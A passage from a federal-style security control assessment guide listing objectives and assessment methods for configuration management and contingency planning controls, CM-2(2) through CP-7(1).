| Examine: [SELECT FROM: Configuration management policy; procedures addressing the baseline configuration of the information system; information system architecture and configuration documentation; other relevant documents or records]. (M) (H) | |
| CM-2(2) | BASELINE CONFIGURATION |
| Control Enhancement: | |
| The organization employs automated mechanisms to maintain an up-to-date, complete, accurate, and readily available baseline configuration of the information system. | |
| CM-2(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to maintain an up-to-date, complete, accurate, and readily available baseline configuration of the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing the baseline configuration of the information system; information system design documentation; information system architecture and configuration documentation; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing baseline configuration maintenance]. (H) |
| ASSESSMENT PROCEDURE | |
| CM-3 | CONFIGURATION CHANGE CONTROL |
| Control: The organization authorizes, documents, and controls changes to the information system. | |
| Supplemental Guidance: The organization manages configuration changes to the information system using an organizationally approved process (e.g., a chartered Configuration Control Board). Configuration change control involves the systematic proposal, justification, implementation, test/evaluation, review, and disposition of changes to the information system, including upgrades and modifications. Configuration change control includes changes to the configuration settings for information technology products (e.g., operating systems, firewalls, routers). The organization includes emergency changes in the configuration change control process, including changes resulting from the remediation of flaws. The approvals to implement a change to the information system include successful results from the security analysis of the change. The organization audits activities associated with configuration changes to the information system. Related security controls: CM-4, CM-6, SI-2. | |
| CM-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization authorizes, documents, and controls changes to the information system using an organizationally approved process; | |
| (ii) the organization configuration change control involves the systematic proposal, justification, implementation, test/evaluation, review, and disposition of changes to the information system, including upgrades and modifications; | |
| (iii) the organization approves changes to the information system with consideration for the results from the security impact analysis of the change; and | |
| (iv) the organization audits activities associated with configuration changes to the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing information system configuration change control; information system architecture and configuration documentation; change control records; information system audit records; other relevant documents or records]. (M) (H) | |
| CM-3(1) | CONFIGURATION CHANGE CONTROL |
| Control Enhancement: | |
| The organization employs automated mechanisms to: (i) document proposed changes to the information system; (ii) notify appropriate approval authorities; (iii) highlight approvals that have not been received in a timely manner; (iv) inhibit change until necessary approvals are received; and (v) document completed changes to the information system. | |
| CM-3(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization employs automated mechanisms to document proposed changes to the information system; | |
| (ii) the organization employs automated mechanisms to notify appropriate approval authorities; | |
| (iii) the organization employs automated mechanisms to highlight approvals that have not been received in a timely manner; | |
| (iv) the organization employs automated mechanisms to inhibit change until necessary approvals are received; and | |
| (v) the organization employs automated mechanisms to document completed changes to the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing information system configuration change control; information system design documentation; information system architecture and configuration documentation; automated configuration control mechanisms; change control records; information system audit records; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing configuration change control]. (H) | |
| CM-3(ICS-1) | CONFIGURATION CHANGE CONTROL |
| ICS Control Enhancements: | |
| The organization tests, validates, and documents changes (e.g., patches and updates) before implementing the changes on the operational ICS. | |
| ICS Enhancement Supplemental Guidance: The organization ensures that testing does not interfere with ICS functions. The individual/group conducting the tests fully understands the organizational information security policies and procedures, the ICS security policies and procedures, and the specific health, safety, and environmental risks associated with a particular facility and/or process. A production ICS may need to be taken off-line, or replicated to the extent feasible, before testing can be conducted. If an ICS must be taken off-line for testing, the tests are scheduled to occur during planned ICS outages whenever possible. In situations where the organization cannot, for operational reasons, conduct live testing of a production ICS, the organization employs compensating controls (e.g., providing a replicated system to conduct testing) in accordance with the general tailoring guidance. | |
| CM-3(ICS-1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization tests, validates, and documents changes (e.g., patches and updates) before implementing the changes on the operational ICS. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing ICS configuration change control; ICS architecture and configuration documentation; change control records; ICS audit records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with configuration change control responsibilities]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| CM-4 | MONITORING CONFIGURATION CHANGES |
| Control: The organization monitors changes to the information system conducting security impact analyses to determine the effects of the changes. | |
| Supplemental Guidance: Prior to change implementation, and as part of the change approval process, the organization analyzes changes to the information system for potential security impacts. After the information system is changed (including upgrades and modifications), the organization checks the security features to verify that the features are still functioning properly. The organization audits activities associated with configuration changes to the information system. Monitoring configuration changes and conducting security impact analyses are important elements with regard to the ongoing assessment of security controls in the information system. Related security control: CA- 7. | |
| CM-4.1 | ASSESSMENT OBJECTIVE: |
Determine if the organization monitors changes to the information system by verifying that the organization:
| |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing the monitoring of configuration changes to the information system; information system architecture and configuration documentation; change control records; information system audit records; other relevant documents or records]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| CM-5 | ACCESS RESTRICTIONS FOR CHANGE |
| Control: The organization: (i) approves individual access privileges and enforces physical and logical access restrictions associated with changes to the information system; and (ii) generates, retains, and reviews records reflecting all such changes. | |
| Supplemental Guidance: Planned or unplanned changes to the hardware, software, and/or firmware components of the information system can have significant effects on the overall security of the system. Accordingly, only qualified and authorized individuals obtain access to information system components for purposes of initiating changes, including upgrades, and modifications. | |
| CM-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization approves individual access privileges and enforces physical and logical access restrictions associated with changes to the information system, including upgrades, and modifications; and | |
| (ii) the organization generates, retains, and reviews records reflecting all such changes to the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing access restrictions for changes to the information system; information system architecture and configuration documentation; change control records; information system audit records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel responsible for generating, retaining, and reviewing records reflecting changes to the information system]. (M) (H) | |
| Test: [SELECT FROM: Change control process and associated restrictions for changes to the information system]. (H) | |
| CM-5(1) | ACCESS RESTRICTIONS FOR CHANGE |
| Control Enhancement: | |
| The organization employs automated mechanisms to enforce access restrictions and support auditing of the enforcement actions. | |
| CM-5(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to enforce access restrictions and support auditing of the enforcement actions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing access restrictions for changes to the information system; information system design documentation; information system architecture and configuration documentation; change control records; information system audit records; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing access restrictions for changes to the information system]. (H) |
| ASSESSMENT PROCEDURE | |
| CM-6 | CONFIGURATION SETTINGS |
| Control: The organization: (i) establishes mandatory configuration settings for information technology products employed within the information system; (ii) configures the security settings of information technology products to the most restrictive mode consistent with operational requirements; (iii) documents the configuration settings; and (iv) enforces the configuration settings in all components of the information system. | |
| Supplemental Guidance: Configuration settings are the configurable parameters of the information technology products that compose the information system. Organizations monitor and control changes to the configuration settings in accordance with organizational policies and procedures. OMB FISMA reporting instructions provide guidance on configuration requirements for federal information systems. NIST Special Publication 800-70 provides guidance on producing and using configuration settings for information technology products employed in organizational information systems. Related security controls: CM-2, CM-3, SI-4. | |
| CM-6.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization establishes mandatory configuration settings for information technology products employed within the information system; | |
| (ii) the organization configures the security settings of information technology products to the most restrictive mode consistent with operational requirements; | |
| (iii) the organization documents the configuration settings; | |
| (iv) the organization enforces the configuration settings in all components of the information system; and | |
| (v) the organization monitors and controls changes to the configuration settings in accordance with organizational policies and procedures. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing configuration settings for the information system; information system configuration settings and associated documentation; NIST Special Publication 800-70; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with security configuration responsibilities]. (M) (H) | |
| CM-6(1) | CONFIGURATION SETTINGS |
| Control Enhancement: | |
| The organization employs automated mechanisms to centrally manage, apply, and verify configuration settings. | |
| CM-6(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system employs automated mechanisms to centrally manage, apply, and verify configuration settings. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing configuration settings for the information system; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing the centralized management, application, and verification of configuration settings]. (H) |
| ASSESSMENT PROCEDURE | |
| CM-7 | LEAST FUNCTIONALITY |
| Control: The organization configures the information system to provide only essential capabilities and specifically prohibits and/or restricts the use of the following functions, ports, protocols, and/or services: [Assignment: organization-defined list of prohibited and/or restricted functions, ports, protocols, and/or services]. | |
| Supplemental Guidance: Information systems are capable of providing a wide variety of functions and services. Some of the functions and services, provided by default, may not be necessary to support essential organizational operations (e.g., key missions, functions). Additionally, it is sometimes convenient to provide multiple services from a single component of an information system, but doing so increases risk over limiting the services provided by any one component. Where feasible, the organization limits component functionality to a single function per device (e.g., email server or web server, not both). The functions and services provided by information systems, or individual components of information systems, are carefully reviewed to determine which functions and services are candidates for elimination (e.g., Voice Over Internet Protocol, Instant Messaging, File Transfer Protocol, Hyper Text Transfer Protocol, file sharing). | |
| CM-7.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, prohibited or restricted functions, ports, protocols, and services for the information system; | |
| (ii) the organization configures the information system to provide only essential capabilities; and | |
| (iii) the organization configures the information system to specifically prohibit and/or restrict the use of organization-defined functions, ports, protocols, and/or services. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing least functionality in the information system; security plan; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Information system for disabling or restriction of functions, ports, protocols, and services]. (H) | |
| CM-7(1) | LEAST FUNCTIONALITY |
| Control Enhancement: | |
| The organization reviews the information system [Assignment: organization-defined frequency], to identify and eliminate unnecessary functions, ports, protocols, and/or services. | |
| CM-7(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the frequency of the information system reviews to identify and eliminate unnecessary functions, ports, protocols, and services; and | |
| (ii) the organization reviews the information system to identify and eliminate unnecessary functions, ports, protocols, and/or services in accordance with organization-defined frequency. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing least functionality in the information system; security plan; information system configuration settings and associated documentation; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibilities for identifying and eliminating unnecessary functions, ports, protocols, and services on the information system]. (H) |
| ASSESSMENT PROCEDURE | |
| CM-8 | INFORMATION SYSTEM COMPONENT INVENTORY |
| Control: The organization develops, documents, and maintains a current inventory of the components of the information system and relevant ownership information. | |
| Supplemental Guidance: The organization determines the appropriate level of granularity for the information system components included in the inventory that are subject to management control (i.e., tracking, and reporting). The inventory of information system components includes any information determined to be necessary by the organization to achieve effective property accountability (e.g., manufacturer, model number, serial number, software license information, system/component owner). The component inventory is consistent with the accreditation boundary of the information system. Related security controls: CM-2, CM-6. | |
| CM-8.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
(i) the organization develops and documents an inventory of the components of the information system:
| |
| (ii) the organization maintains the inventory of the components of the information system to reflect the current state of the system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing information system component inventory; information system inventory records; other relevant documents or records]. (L) (M) (H) | |
| CM-8(1) | INFORMATION SYSTEM COMPONENT INVENTORY |
| Control Enhancement: | |
| The organization updates the inventory of information system components as an integral part of component installations. | |
| CM-8(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization updates the inventory of information system components as an integral part of component installations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing information system component inventory; information system inventory records; component installation records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system installation and inventory responsibilities]. (H) | |
| CM-8(2) | INFORMATION SYSTEM COMPONENT INVENTORY |
| Control Enhancement: | |
| The organization employs automated mechanisms to help maintain an up-to-date, complete, accurate, and readily available inventory of information system components. | |
| CM-8(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to maintain an up-to-date, complete, accurate, and readily available inventory of information system components. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing information system component inventory; information system design documentation; information system inventory records; component installation records; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing information system component inventory management]. (H) |
FAMILY:
Contingency Planning
| ASSESSMENT PROCEDURE | |
| CP-1 | CONTINGENCY PLANNING POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, contingency planning policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the contingency planning policy and associated contingency planning controls. | |
| Supplemental Guidance: The contingency planning policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The contingency planning policy can be included as part of the general information security policy for the organization. Contingency planning procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-34 provides guidance on contingency planning. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| CP-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents contingency planning policy and procedures; | |
| (ii) the organization disseminates contingency planning policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review contingency planning policy and procedures; and | |
| (iv) the organization updates contingency planning policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with contingency planning responsibilities]. (H) | |
| CP-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the contingency planning policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the contingency planning policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the contingency planning procedures address all areas identified in the contingency planning policy and address achieving policy-compliant implementations of all associated contingency planning controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with contingency planning responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| CP-2 | CONTINGENCY PLAN |
| Control: The organization develops and implements a contingency plan for the information system addressing contingency roles, responsibilities, assigned individuals with contact information, and activities associated with restoring the system after a disruption or failure. Designated officials within the organization review and approve the contingency plan and distribute copies of the plan to key contingency personnel. | |
| Supplemental Guidance: None. | |
| CP-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents a contingency plan for the information system; | |
| (ii) the contingency plan is consistent with NIST Special Publication 800-34; and | |
| (iii) the contingency plan addresses contingency roles, responsibilities, assigned individuals with contact information, and activities associated with restoring the information system after a disruption or failure; | |
| (iv) the contingency plan is reviewed and approved by designated organizational officials; and | |
| (v) the organization disseminates the contingency plan to key contingency personnel. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; procedures addressing contingency operations for the information system; NIST Special Publication 800-34; contingency plan; other relevant documents or records]. (L) (M) (H) | |
| CP-2(1) | CONTINGENCY PLAN |
| Control Enhancement: | |
| The organization coordinates contingency plan development with organizational elements responsible for related plans. | |
| Enhancement Supplemental Guidance: Examples of related plans include Business Continuity Plan, Disaster Recovery Plan, Continuity of Operations Plan, Business Recovery Plan, Incident Response Plan, and Emergency Action Plan. | |
| CP-2(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization coordinates the contingency plan with other related plans (e.g., Business Continuity Plan, Disaster Recovery Plan, Continuity of Operations Plan, Business Recovery Plan, Incident Response Plan, Emergency Action Plan). | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; procedures addressing contingency operations for the information system; contingency plan; other related plans; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with contingency planning and plan implementation responsibilities and responsibilities in related plan areas]. (M) (H) | |
| CP-2(2) | CONTINGENCY PLAN |
| Control Enhancement: | |
| The organization conducts capacity planning so that necessary capacity for information processing, telecommunications, and environmental support exists during crisis situations. | |
| CP-2(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization conducts capacity planning so that necessary capacity for information processing, telecommunications, and environmental support exists during crisis situations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; procedures addressing contingency operations for the information system; contingency plan; capacity planning documents; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with contingency planning and plan implementation responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| CP-3 | CONTINGENCY TRAINING |
| Control: The organization trains personnel in their contingency roles and responsibilities with respect to the information system and provides refresher training [Assignment: organization-defined frequency, at least annually]. | |
| Supplemental Guidance: None. | |
| CP-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization provides contingency training to personnel with contingency roles and responsibilities; | |
| (ii) the organization defines in the security plan, explicitly or by reference, the frequency of refresher contingency training and the frequency is at least annually; and | |
| (iii) the organization provides initial training and refresher training in accordance with organization-defined frequency. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency training; contingency training curriculum; contingency training material; security plan; contingency training records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with contingency planning, plan implementation, and training responsibilities]. (H) | |
| CP-3.2 | ASSESSMENT OBJECTIVE: |
| Determine if contingency training material addresses the procedures and activities necessary to fulfill identified organizational contingency roles and responsibilities. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency training; contingency training curriculum; contingency training material; other relevant documents or records]. (M) (H) | |
| CP-3(1) | CONTINGENCY TRAINING |
| Control Enhancement: | |
| The organization incorporates simulated events into contingency training to facilitate effective response by personnel in crisis situations. | |
| CP-3(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization incorporates simulated events into contingency training; and | |
| (ii) the incorporation of simulated events into contingency training facilitates effective response by personnel in crisis situations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency training; contingency training curriculum; contingency training material; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with contingency planning, plan implementation, and training responsibilities]. (H) | |
| CP-3(2) | CONTINGENCY TRAINING |
| Control Enhancement: | |
| The organization employs automated mechanisms to provide a more thorough and realistic training environment. | |
| CP-3(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms that provide a more thorough and realistic contingency training environment. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency training; automated mechanisms supporting contingency training; contingency training curriculum; contingency training material; other relevant documents or records]. | |
| Interview: [SELECT FROM: Organizational personnel with contingency planning, plan implementation, and training responsibilities]. |
| ASSESSMENT PROCEDURE | |
| CP-4 | CONTINGENCY PLAN TESTING AND EXERCISES |
| Control: The organization: (i) tests and/or exercises the contingency plan for the information system [Assignment: organization-defined frequency, at least annually] using [Assignment: organization-defined tests and/or exercises] to determine the plan's effectiveness and the organization's readiness to execute the plan; and (ii) reviews the contingency plan test/exercise results and initiates corrective actions. | |
| Supplemental Guidance: There are several methods for testing and/or exercising contingency plans to identify potential weaknesses (e.g., full-scale contingency plan testing, functional/tabletop exercises). The depth and rigor of contingency plan testing and/or exercises increases with the FIPS 199 impact level of the information system. Contingency plan testing and/or exercises also include a determination of the effects on organizational operations and assets (e.g., reduction in mission capability) and individuals arising due to contingency operations in accordance with the plan. NIST Special Publication 800-84 provides guidance on test, training, and exercise programs for information technology plans and capabilities. | |
| CP-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the contingency plan tests and/or exercises to be conducted; | |
| (ii) the organization defines in the security plan, explicitly or by reference, the frequency of contingency plan tests and/or exercises and the frequency is at least annually; | |
| (iii) the organization tests/exercises the contingency plan using organization-defined tests/exercises in accordance with organization-defined frequency; and | |
| (iv) the organization reviews the contingency plan test/exercise results and takes corrective actions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan, procedures addressing contingency plan testing and exercises; security plan; contingency plan testing and/or exercise documentation; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibilities for reviewing or responding to contingency plan tests/exercises]. (M) (H) | |
| CP-4.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the contingency plan tests/exercises confirm the plan's effectiveness; | |
| (ii) the contingency plan tests/exercises confirm the organization's readiness to execute the plan; and | |
| (iii) the contingency plan tests/exercises confirm the effects on organizational operations and assets (e.g., reduction in mission capability) and individuals arising due to contingency operations in accordance with the plan. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency plan testing and exercises; contingency plan testing and/or exercise documentation; contingency plan test results; other relevant documents or records]. (L) (M) (H) | |
| CP-4(1) | CONTINGENCY PLAN TESTING AND EXERCISES |
| Control Enhancement: | |
| The organization coordinates contingency plan testing and/or exercises with organizational elements responsible for related plans. | |
| Enhancement Supplemental Guidance: Examples of related plans include Business Continuity Plan, Disaster Recovery Plan, Continuity of Operations Plan, Business Recovery Plan, Incident Response Plan, and Emergency Action Plan. | |
| CP-4(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization coordinates contingency plan testing and/or exercises with organizational elements responsible for related plans (e.g., Business Continuity Plan, Disaster Recovery Plan, Continuity of Operations Plan, Business Recovery Plan, Incident Response Plan, Emergency Action Plan). | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency plan testing and exercises; contingency plan testing and/or exercise documentation; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with contingency planning, plan implementation, and testing responsibilities]. (M) (H) | |
| CP-4(2) | CONTINGENCY PLAN TESTING AND EXERCISES |
| Control Enhancement: | |
| The organization tests/exercises the contingency plan at the alternate processing site to familiarize contingency personnel with the facility and available resources and to evaluate the site's capabilities to support contingency operations. | |
| CP-4(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization conducts contingency plan testing at the alternate processing site to familiarize contingency personnel with the facility and its resources and to evaluate the site's capabilities to support contingency operations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan, procedures addressing contingency plan testing and exercises; contingency plan testing and/or exercise documentation; contingency plan test results; other relevant documents or records]. (H) | |
| CP-4(3) | CONTINGENCY PLAN TESTING AND EXERCISES |
| Control Enhancement: | |
| The organization employs automated mechanisms to more thoroughly and effectively test/exercise the contingency plan by providing more complete coverage of contingency issues, selecting more realistic test/exercise scenarios and environments, and more effectively stressing the information system and supported missions. | |
| CP-4(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to more thoroughly and effectively test/exercise the contingency plan by providing more complete coverage of contingency issues, selecting more realistic test/exercise scenarios and environments, and more effectively stressing the information system and supported missions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency plan testing and exercises; automated mechanisms supporting contingency plan testing/exercises; contingency plan testing and/or exercise documentation; other relevant documents or records]. |
| ASSESSMENT PROCEDURE | |
| CP-5 | CONTINGENCY PLAN UPDATE |
| Control: The organization reviews the contingency plan for the information system [Assignment: organization-defined frequency, at least annually] and revises the plan to address system/organizational changes or problems encountered during plan implementation, execution, or testing. | |
| Supplemental Guidance: Organizational changes include changes in mission, functions, or business processes supported by the information system. The organization communicates changes to appropriate organizational elements responsible for related plans (e.g., Business Continuity Plan, Disaster Recovery Plan, Continuity of Operations Plan, Business Recovery Plan, Incident Response Plan, Emergency Action Plan). | |
| CP-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the frequency of contingency plan reviews and updates and the frequency is at least annually; | |
| (ii) the organization reviews the contingency plan in accordance with organization- defined frequency; and | |
| (iii) the organization updates the contingency plan as necessary to addresses the system/organizational changes identified by the organization or any problems encountered by the organization during plan implementation, execution, and testing. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency plan reviews and updates; security plan; other relevant documents or records]. (L) (M) (H) | |
| CP-5.2 | ASSESSMENT OBJECTIVE: |
| Determine if the organization communicates necessary changes to the contingency plan to other organizational elements with related plans. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency plan reviews and updates; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with contingency plan update responsibilities; organizational personnel with mission-related and operational responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| CP-6 | ALTERNATE STORAGE SITE |
| Control: The organization identifies an alternate storage site and initiates necessary agreements to permit the storage of information system backup information. | |
| Supplemental Guidance: The frequency of information system backups and the transfer rate of backup information to the alternate storage site (if so designated) are consistent with the organization's recovery time objectives and recovery point objectives. | |
| CP-6.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization identifies an alternate storage site; and | |
| (ii) the organization initiates necessary alternate storage site agreements to permit storage of information system backup information. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate storage sites; alternate storage site agreements; other relevant documents or records]. (M) (H) | |
| CP-6(1) | ALTERNATE STORAGE SITE |
| Control Enhancement: | |
| The organization identifies an alternate storage site that is geographically separated from the primary storage site so as not to be susceptible to the same hazards. | |
| CP-6(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the contingency plan identifies the primary storage site hazards; and | |
| (ii) the alternate storage site is sufficiently separated from the primary storage site so as not to be susceptible to the same hazards identified at the primary site. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate storage sites; alternate storage site; other relevant documents or records]. (M) (H) | |
| CP-6(2) | ALTERNATE STORAGE SITE |
| Control Enhancement: | |
| The organization configures the alternate storage site to facilitate timely and effective recovery operations. | |
| CP-6(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the alternate storage site is configured to enable timely and effective recovery operations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate storage sites; alternate storage site agreements; alternate storage site; other relevant documents or records]. (H) | |
| CP-6(3) | ALTERNATE STORAGE SITE |
| Control Enhancement: | |
| The organization identifies potential accessibility problems to the alternate storage site in the event of an area-wide disruption or disaster and outlines explicit mitigation actions. | |
| CP-6(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization identifies potential accessibility problems to the alternate storage site in the event of an area-wide disruption or disaster; and | |
| (ii) the organization defines explicit mitigation actions for potential accessibility problems. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate storage sites; alternate storage site; other relevant documents or records]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| CP-7 | ALTERNATE PROCESSING SITE |
| Control: The organization identifies an alternate processing site and initiates necessary agreements to permit the resumption of information system operations for critical mission/business functions within [Assignment: organization-defined time period] when the primary processing capabilities are unavailable. | |
| Supplemental Guidance: Equipment and supplies required to resume operations within the organization-defined time period are either available at the alternate site or contracts are in place to support delivery to the site. Timeframes to resume information system operations are consistent with organization-established recovery time objectives. | |
| CP-7.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization identifies an alternate processing site; | |
| (ii) the organization defines in the security plan, explicitly or by reference, the time period within which processing must be resumed at the alternate processing site; and | |
| (iii) the organization initiates necessary alternate processing site agreements to permit the resumption of information system operations for critical mission/business functions within organization-defined time period. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate processing sites; alternate processing site agreements; security plan; other relevant documents or records]. (M) (H) | |
| CP-7(1) | ALTERNATE PROCESSING SITE |
| Control Enhancement: | |
| The organization identifies an alternate processing site that is geographically separated from the primary processing site so as not to be susceptible to the same hazards. | |
